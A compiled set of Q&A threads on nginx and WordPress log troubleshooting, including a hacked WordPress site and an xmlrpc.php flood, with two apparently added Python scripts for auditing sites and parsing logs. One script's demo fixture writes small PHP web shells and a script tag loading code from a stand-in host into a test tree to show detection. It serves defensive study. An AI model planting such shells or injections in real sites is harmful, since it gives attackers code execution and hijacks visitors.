how to get real ip in nginx access.log - nginx

I have a serious problem. My website is being spammed through the Joomla contact form. In the nginx access.log I see only:
10.50.0.1 - - [06/Sep/2017:19:57:32 +0200] "GET /index.php/en/kontakt HTTP/1.1" 200 16132 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
10.50.0.1 - - [06/Sep/2017:19:57:32 +0200] "POST /index.php/en/kontakt HTTP/1.1" 301 193 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
10.50.0.1 - - [06/Sep/2017:19:57:34 +0200] "POST /index.php/en/kontakt HTTP/1.1" 301 193 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
10.50.0.1 - - [06/Sep/2017:19:57:34 +0200] "GET /index.php/en/kontakt HTTP/1.1" 301 193 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
10.50.0.1 - - [06/Sep/2017:19:57:34 +0200] "GET /index.php/en/kontakt HTTP/1.1" 301 193 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
10.50.0.1 - - [06/Sep/2017:19:57:36 +0200] "GET /index.php/en/kontakt HTTP/1.1" 200 16132 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
10.50.0.1 - - [06/Sep/2017:19:57:37 +0200] "GET /index.php/en/kontakt HTTP/1.1" 301 193 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
10.50.0.1 - - [06/Sep/2017:19:57:37 +0200] "GET /index.php/en/kontakt HTTP/1.1" 200 16132 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
10.50.0.1 - - [06/Sep/2017:19:57:37 +0200] "GET /index.php/en/kontakt HTTP/1.1" 301 193 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
When I run the Linux command tail, new requests come one after another. This is a shock! My website is very slow. I have a private server with a public IP. My local IP is 10.50.0.6 and the gateway is 10.50.0.1. DNS is at my domain provider, and the A record forwards traffic to my public IP, then the router forwards it to my local IP. I would like to block the IP range that is spamming my domain, but I don't see the original address there; I see only my gateway IP. I installed fail2ban and added reCAPTCHA to the contact form, but it did not help. How can I resolve this problem?

You need access to the router.
The router should be capable of logging the address translations that it makes, and by comparing these logs with your nginx logs you should be able to identify the originating IP address. The router should also be capable of implementing an access list so that you can block the originating IP address.

Related

How to block in NGINX all request starting with question mark

My website is getting attacked with requests such as:
66.249.75.242 - - [12/Jan/2023:00:29:11 +0800] "GET /?bailiffry/1529595 HTTP/1.1" 200 57100 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.115 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [12/Jan/2023:00:29:14 +0800] "GET /?Diphysite-7105-hwfLs/328609048 HTTP/1.1" 200 57097 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [12/Jan/2023:00:29:16 +0800] "GET /?hypothermal/sealant313919.html HTTP/1.1" 200 57100 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.115 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [12/Jan/2023:00:29:17 +0800] "GET /?dianilid/elated357845.html HTTP/1.1" 200 57100 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.115 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
I have blocked other patterns; I just wish to block this one for now, as I have been working on this for hours and want a quick fix.
How do I block requests starting with a question mark?
Yes, you can. See the section below:
Drop unwanted connections
# $request_uri is the raw request line path, so "^/\?" matches "/?anything"
if ($request_uri ~ "^/\?") {
    return 444;   # close the connection without sending a response
}
You can also put a WAF (Web Application Firewall) in front of it, if these requests are part of a security issue you're facing.
You can look at NAXSI. It's open source and compatible with any nginx version.

nginx reverse proxy worked on LAN but not public

I am setting up a Nginx reverse proxy using these docker images
nginx
jwilder/docker-gen
jrcs/letsencrypt-nginx-proxy-companion
The host where these containers are located is given a public IP address so that the web app can be accessed from the internet. We registered the subdomain and set it to that public IP address.
When I test the configuration, the web app works and https also works, but from the LAN only (we have a local DNS server that pairs the subdomain with the local server IP address).
But when I tried accessing it from the internet it gives "301 redirected too many times". And yes, I saw in the Nginx log that the server logged around twenty 301 redirections and then stopped.
I am still clueless about what is wrong with the configuration. I used this template https://raw.githubusercontent.com/jwilder/nginx-proxy/master/nginx.tmpl for the auto-generated configuration files, with a little modification in the location part (proxy_connect_timeout, proxy_send_timeout, proxy_read_timeout, proxy_send_lowat) so that our web app does not get a 502 gateway timeout from long processing.
Can anyone point where my configuration failed?
# fhij.abcd.co.id
upstream fhij.abcd.co.id {
    ## Can be connected with "nginx-proxy" network
    # fhid_web_1
    server 172.20.0.8:8069;
}
server {
    server_name fhij.abcd.co.id;
    listen 80 ;
    access_log /var/log/nginx/access.log vhost;
    return 301 https://$host$request_uri;
}
server {
    server_name fhij.abcd.co.id;
    listen 443 ssl http2 ;
    access_log /var/log/nginx/access.log vhost;
    ssl_session_timeout 5m;
    ssl_session_cache shared:SSL:50m;
    ssl_session_tickets off;
    ssl_certificate /etc/nginx/certs/fhij.abcd.co.id.crt;
    ssl_certificate_key /etc/nginx/certs/fhij.abcd.co.id.key;
    ssl_dhparam /etc/nginx/certs/fhij.abcd.co.id.dhparam.pem;
    ssl_stapling on;
    ssl_stapling_verify on;
    ssl_trusted_certificate /etc/nginx/certs/fhij.abcd.co.id.chain.pem;
    add_header Strict-Transport-Security "max-age=31536000" always;
    include /etc/nginx/vhost.d/default;
    location / {
        proxy_pass http://fhij.abcd.co.id;
        proxy_connect_timeout 9990;
        proxy_send_timeout 9990;
        proxy_read_timeout 9990;
        proxy_send_lowat 12000;
    }
}
These are the access.log entries I got when accessing from the internet:
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:42 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:43 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:43 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:43 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:43 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:43 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:44 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:44 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:44 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:45 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:45 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:46 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:46 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:46 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:46 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:46 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:47 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:47 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:47 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:47 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
And these are from the LAN:
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "GET / HTTP/2.0" 303 215 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "GET /web HTTP/2.0" 303 227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "GET /web/login HTTP/2.0" 200 4383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "GET /web/content/269-ceb8fb1/web.assets_common.0.css HTTP/2.0" 499 0 "https://fhij.abcd.co.id/web/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "GET /web/content/276-771d39e/web.assets_frontend.0.css HTTP/2.0" 499 0 "https://fhij.abcd.co.id/web/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "GET /web/webclient/qweb?mods= HTTP/2.0" 304 0 "https://fhij.abcd.co.id/web/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "POST /web/webclient/bootstrap_translations HTTP/2.0" 200 87 "https://fhij.abcd.co.id/web/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
Why is it so different? Nginx's response to the internet request was 301 and the response to the LAN request was 303.
It turned out there was a mistake in our Cloudflare DNS and WAF configuration. Modifying this configuration fixed the issue.

Strange requests to web server

I have a VPS running Nginx, which currently serves only static content.
Once, while looking at the log, I noticed some strange requests:
216.244.66.239 - - [03/Jan/2019:15:04:26 +0100] "GET /en/profile/Souxy HTTP/1.1" 200 4650 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.239 - - [03/Jan/2019:15:04:28 +0100] "GET /en/view/8gIi2vad8Y HTTP/1.1" 200 4650 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
This is a crawler. There is a description at this link: https://moz.com/help/moz-procedures/crawlers/dotbot. Maybe it is indexing your website.
You can block these requests on the firewall, or add a robots.txt file with the content:
User-agent: dotbot
Disallow: /

Wordpress compromised but I do not know how

Today my WordPress site was compromised, so it now serves a JS script that redirects to a SPAM site.
I looked inside the Apache logs to reconstruct what happened, but I don't know how to interpret this:
xx.xx.xx.xx - - [09/Jan/2017:10:24:42 +0100] "GET /wp-login.php HTTP/1.1" 200 6111 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:42 +0100] "GET /wp-login.php HTTP/1.1" 200 6111 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:43 +0100] "GET /wp-login.php HTTP/1.1" 200 6111 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:43 +0100] "GET /wp-login.php HTTP/1.1" 200 6111 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:43 +0100] "POST /wp-login.php HTTP/1.1" 302 4 "/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:43 +0100] "POST /wp-login.php HTTP/1.1" 302 4 "/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:44 +0100] "GET /wp-admin/ HTTP/1.1" 302 4 "http://my.host.name/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:44 +0100] "GET /wp-admin/ HTTP/1.1" 200 219966 "/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:47 +0100] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 183974 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:48 +0100] "GET /wp-admin/theme-editor.php?file=404.php&theme=twentyfourteen HTTP/1.1" 500 3427 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:49 +0100] "GET /wp-admin/theme-install.php?upload HTTP/1.1" 200 161448 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
As you can see, somebody tried to log in but couldn't. But after two simple GET requests to "/wp-admin/" he seems to be logged in and able to modify and install a new theme.
At this point I tried to find differences between the wp-admin directory present on the server and the original one downloaded from the official site wordpress.org, but I didn't find any differences.
I compared all files present in wp-admin with the "diff" utility and couldn't find any difference. For example:
diff /var/www/html/original.wordpress/wp-admin/themes.php /var/www/html.hacked/wp-admin/themes.php didn't output anything.
Could you help me find evidence?
Looks like your exploit happened here:
/wp-admin/theme-install.php?upload
Make sure your themes and plugins are updated. That last request returned a 200 response from your webserver to the attacker, and was likely used to upload a backdoor. I'd audit the contents of /wp-content/uploads/ to see if there are any out of place PHP files (backdoor shells) in there. If so, it's possible they used that to pivot within your site, so there may be other directories containing PHP backdoors elsewhere.
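To act on the answer above, here is an added example (not code from the question or the answer) that audits a WordPress tree the way the answer recommends: it lists PHP files under wp-content/uploads, including double extensions such as name.php.jpg, and compares every file of the live site against a pristine download of the same version, so files the attacker added or changed outside wp-admin show up too, which a `diff` of wp-admin alone cannot catch. The site paths and the demo tree it builds in a temporary directory are constructed for illustration (bad.example is a placeholder host); point `compare_trees` at the real pristine and live directories to use it.

```python
"""Audit a WordPress tree for planted PHP and for files that differ from a pristine copy.
Added example, not from the thread; paths and the demo tree below are constructed."""
import hashlib
import tempfile
from pathlib import Path

# Directories that must never hold executable PHP; wp-content/uploads is where a
# shell dropped through theme-install.php?upload or a media upload usually lands.
NO_PHP_DIRS = ("wp-content/uploads",)
PHP_SUFFIXES = (".php", ".phtml", ".php5", ".php7", ".phar")


def sha256_of(path):
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_hashes(root):
    """Every regular file under root (relative POSIX path) mapped to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_of(p) for p in root.rglob("*") if p.is_file()}


def find_php_in_uploads(root):
    """PHP under the upload directories, including double extensions such as
    shell.php.jpg that a loose AddHandler/location rule may still execute."""
    root, hits = Path(root), []
    for sub in NO_PHP_DIRS:
        if not (root / sub).is_dir():
            continue
        for p in (root / sub).rglob("*"):
            if p.is_file() and any(s.lower() in PHP_SUFFIXES for s in p.suffixes):
                hits.append(p.relative_to(root).as_posix())
    return sorted(hits)


def compare_trees(pristine, live):
    """Diff the live site against a clean download of the same WordPress version.
    A `diff` of wp-admin alone misses files the attacker added elsewhere; hashing
    the whole tree surfaces added, modified and removed files in one pass."""
    a, b = tree_hashes(pristine), tree_hashes(live)
    return {"added": sorted(b.keys() - a.keys()),
            "removed": sorted(a.keys() - b.keys()),
            "modified": sorted(k for k in a.keys() & b.keys() if a[k] != b[k])}


def build_demo_tree():
    """Constructed demo: a small pristine tree and a copy with an edited theme file,
    a web shell and a double-extension shell under uploads. Returns (pristine, live)."""
    base = Path(tempfile.mkdtemp(prefix="wpaudit-"))
    files = {"wp-admin/themes.php": "<?php // unchanged admin page\n",
             "wp-content/themes/twentyfourteen/404.php": "<?php get_header();\n",
             "wp-content/uploads/2017/01/photo.jpg": "JFIF placeholder\n"}
    for site in ("pristine", "live"):
        for rel, body in files.items():
            (base / site / rel).parent.mkdir(parents=True, exist_ok=True)
            (base / site / rel).write_text(body)
    live = base / "live"  # attacker's edits below; bad.example is a placeholder host
    (live / "wp-content/themes/twentyfourteen/404.php").write_text(
        "<?php get_header(); echo '<script src=//bad.example/r.js></script>';\n")
    (live / "wp-content/uploads/2017/01/cache.php").write_text("<?php eval($_POST['c']);\n")
    (live / "wp-content/uploads/2017/01/img.php.jpg").write_text("<?php system($_GET['c']);\n")
    return base / "pristine", live


if __name__ == "__main__":
    pristine, live = build_demo_tree()
    print("PHP under uploads:", find_php_in_uploads(live))
    print("tree diff:", compare_trees(pristine, live))
```

Run the comparison against a download of the exact WordPress version the site runs, and expect wp-config.php, .htaccess and the uploads directory to appear under "added" legitimately; everything else listed there, and any "modified" core or theme file, is what to read first. A clean PHP check of uploads is only meaningful if the web server also refuses to execute PHP from that directory.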

Wordpress hosted on EC2 overloads the server

I have hosted a WordPress website on an Amazon EC2 t2.medium server instance.
The OS is 64-bit Ubuntu 16.x.x.
The issue is that after the server is up for about 2-3 days, it suddenly overloads and stops responding.
I am not sure what is triggering this overload on the server.
When I stop the Apache server, the load gradually decreases, and restarting it after a few minutes fixes the problem.
Here is the load info,
ubuntu@ip-172-31-18-127:~$ uptime
12:42:43 up 6 days, 49 min, 2 users, load average: 32.58, 63.91, 34.88
ubuntu@ip-172-31-18-127:~$ uptime
12:42:47 up 6 days, 49 min, 2 users, load average: 29.97, 62.85, 34.69
ubuntu@ip-172-31-18-127:~$ uptime
12:42:50 up 6 days, 49 min, 2 users, load average: 27.57, 61.80, 34.50
ubuntu@ip-172-31-18-127:~$ uptime
12:42:54 up 6 days, 49 min, 2 users, load average: 25.36, 60.78, 34.32
ubuntu@ip-172-31-18-127:~$ uptime
12:43:27 up 6 days, 49 min, 2 users, load average: 15.37, 54.97, 33.22
ubuntu@ip-172-31-18-127:~$ uptime
12:51:15 up 6 days, 57 min, 2 users, load average: 0.00, 11.38, 20.01
Has anyone had the same kind of issue with WordPress on EC2? Is it triggered by some plugin, or is my server configuration wrong?
Thank you in advance.
EDIT
I looked into the Apache access and error logs.
access logs
191.96.249.54 - - [05/Oct/2016:07:56:10 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.54 - - [05/Oct/2016:07:56:06 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.54 - - [05/Oct/2016:07:56:09 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.53 - - [05/Oct/2016:07:56:05 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.54 - - [05/Oct/2016:07:56:02 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.54 - - [05/Oct/2016:07:56:03 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.53 - - [05/Oct/2016:07:56:07 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
52.58.212.131 - - [05/Oct/2016:07:56:35 +0000] "POST /wp-cron.php?doing_wp_cron=1475.3754720687866210937500 HTTP/1.1" 200 166 "http://52.58.212.131/wp-cron.php?doing_wp_cron=1475.3754720687866210937500" "WordPress/4.6.1; http://52.58.212.131"
191.96.249.54 - - [05/Oct/2016:07:56:06 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.54 - - [05/Oct/2016:07:56:03 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.54 - - [05/Oct/2016:07:56:15 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.53 - - [05/Oct/2016:07:56:11 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
error logs
[Wed Oct 05 06:25:27.206451 2016] [mpm_prefork:notice] [pid 27426] AH00163: Apache/2.4.18 (Ubuntu) configured -- resuming normal operations
[Wed Oct 05 06:25:27.206490 2016] [core:notice] [pid 27426] AH00094: Command line: '/usr/sbin/apache2'
*** Error in `/usr/sbin/apache2': double free or corruption (!prev): 0x00005629347d6910 ***
[Wed Oct 05 07:57:13.804332 2016] [core:notice] [pid 27426] AH00051: child pid 11014 exit signal Segmentation fault (11), possible coredump in /etc/apache2
[Wed Oct 05 07:57:14.806735 2016] [mpm_prefork:notice] [pid 27426] AH00169: caught SIGTERM, shutting down
I suppose this is where the server overloads and Apache stops responding.
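Four of the questions on this page come down to reading the access log for a signal the poster could not see. The script below is an added example, not code from any of the posts: it parses combined-format lines (with the optional leading vhost that the nginx-proxy "vhost" log format prepends) and runs one check per question over a constructed subset of the lines quoted above. For the Joomla contact-form question it tests whether every hit carries the gateway address, which is what a router that rewrites the source address as well as the destination produces; in that situation the log cannot name the sender, a fail2ban ban keyed on the address would hit the gateway itself, and the router's own translation log is the only record left, as that answer says. For the reverse-proxy question it finds runs of repeated 301s from one client and checks whether that client sits in a CDN edge range (162.158.0.0/15 is one of the IPv4 ranges Cloudflare publishes; CDN_RANGES is a constructed one-entry subset, verify against the current list at cloudflare.com/ips). For the EC2 question it counts clients flooding xmlrpc.php with POSTs. For the compromised-WordPress question it looks for a POST to wp-login.php answered with 302, which is what WordPress returns on a successful login (a failed login re-renders the form with a 200), followed by the theme editor and theme upload pages. The thresholds are assumptions tuned to the few sample lines; raise them for real logs.

```python
"""Detections over access-log lines quoted in this thread (added example, not code from any
post). SAMPLE is a constructed subset of those lines; CDN_RANGES is a constructed one-entry
subset of the address ranges Cloudflare publishes. Combined log format, optional leading vhost."""
import re
from collections import Counter, defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network

LOG_RE = re.compile(
    r'^(?:(?P<vhost>\S+) )?(?P<ip>\S+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

def parse(lines):
    """Parsed dicts for the lines that match; malformed lines are skipped."""
    out = []
    for m in filter(None, map(LOG_RE.match, lines)):
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["status"] = int(e["status"])
        out.append(e)
    return out

def nat_masked(entries, gateway):
    """All hits carry the gateway address (source rewritten by the router): a per-IP ban bans everyone."""
    return bool(entries) and all(e["ip"] == gateway for e in entries)

def bursts(entries, key, window_s=5, threshold=5):
    """Keys with at least `threshold` hits inside some `window_s`-second window."""
    times = defaultdict(list)
    for e in entries:
        times[key(e)].append(e["ts"])
    hot = set()
    for k, ts in times.items():
        ts.sort()
        if any((ts[i + threshold - 1] - ts[i]).total_seconds() <= window_s
               for i in range(len(ts) - threshold + 1)):
            hot.add(k)
    return hot

def redirect_loops(entries, min_run=3):
    """Runs of >= min_run consecutive 301/302s for one client and path: the client is
    sent back to the URL it just requested ("redirected you too many times")."""
    runs, last, n = [], None, 0
    for e in entries:
        key = (e["ip"], e["method"], e["path"])
        if e["status"] in (301, 302) and key == last:
            n += 1
            continue
        if n >= min_run:
            runs.append((last, n))
        last, n = key, (1 if e["status"] in (301, 302) else 0)
    if n >= min_run:
        runs.append((last, n))
    return runs

CDN_RANGES = [ip_network("162.158.0.0/15")]  # constructed subset; check cloudflare.com/ips
def behind_cdn(ip):
    """Client in a CDN edge range: the visitor's real address is only in a forwarded header."""
    try:
        return any(ip_address(ip) in net for net in CDN_RANGES)
    except ValueError:  # masked address such as xx.xx.xx.xx
        return False

def post_flood(entries, path="/xmlrpc.php", threshold=3):
    """Clients POSTing to `path` at least `threshold` times; a single xmlrpc.php
    system.multicall request can carry many login attempts, hence the CPU load."""
    c = Counter(e["ip"] for e in entries if e["method"] == "POST" and e["path"] == path)
    return {ip: n for ip, n in c.items() if n >= threshold}

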